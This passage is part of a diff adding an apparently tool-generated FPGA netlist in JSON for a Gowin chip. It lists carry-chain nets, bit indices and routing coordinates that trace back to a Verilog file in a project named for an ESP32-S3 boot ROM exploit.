+ "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7848 ] , + "attributes": { + "ROUTING": "X2Y12/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7846 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7845 ] , + "attributes": { + "ROUTING": "X3Y12/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7843 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7842 ] , + "attributes": { + "ROUTING": "X3Y12/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7840 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7839 ] , + "attributes": { + "ROUTING": "X3Y12/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7837 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7836 ] , + "attributes": { + "ROUTING": "X3Y12/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7834 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7833 ] , + "attributes": { + "ROUTING": "X3Y12/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7831 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7830 ] , + "attributes": { + "ROUTING": "X3Y12/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7828 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7827 ] , + "attributes": { + "ROUTING": "X4Y12/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7825 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7824 ] , + "attributes": { + "ROUTING": "X4Y12/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7822 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7821 ] , + "attributes": { + "ROUTING": "X4Y12/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7819 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7818 ] , + "attributes": { + "ROUTING": "X4Y12/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7816 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7815 ] , + "attributes": { + "ROUTING": "X4Y12/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7813 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7812 ] , + "attributes": { + "ROUTING": "X4Y12/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7810 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7809 ] , + "attributes": { + "ROUTING": "X5Y12/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7806 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7804 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7803 ] , + "attributes": { + "ROUTING": "X2Y13/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7801 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7800 ] , + "attributes": { + "ROUTING": "X2Y13/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7798 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7797 ] , + "attributes": { + "ROUTING": "X2Y13/COUT3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7795 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7794 ] , + "attributes": { + "ROUTING": "X2Y13/COUT4;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7792 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7791 ] , + "attributes": { + "ROUTING": "X3Y13/CIN0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7789 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7788 ] , + "attributes": { + "ROUTING": "X3Y13/COUT0;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7786 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7785 ] , + "attributes": { + "ROUTING": "X3Y13/COUT1;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7783 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 7782 ] , + "attributes": { + "ROUTING": "X3Y13/COUT2;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.57-44.116|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29", + "abc9_carry": "00000000000000000000000000000001" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 7780 ] , + "attributes": { + "ROUTING": " ", + "unused_bits": "0 " + } + }, + 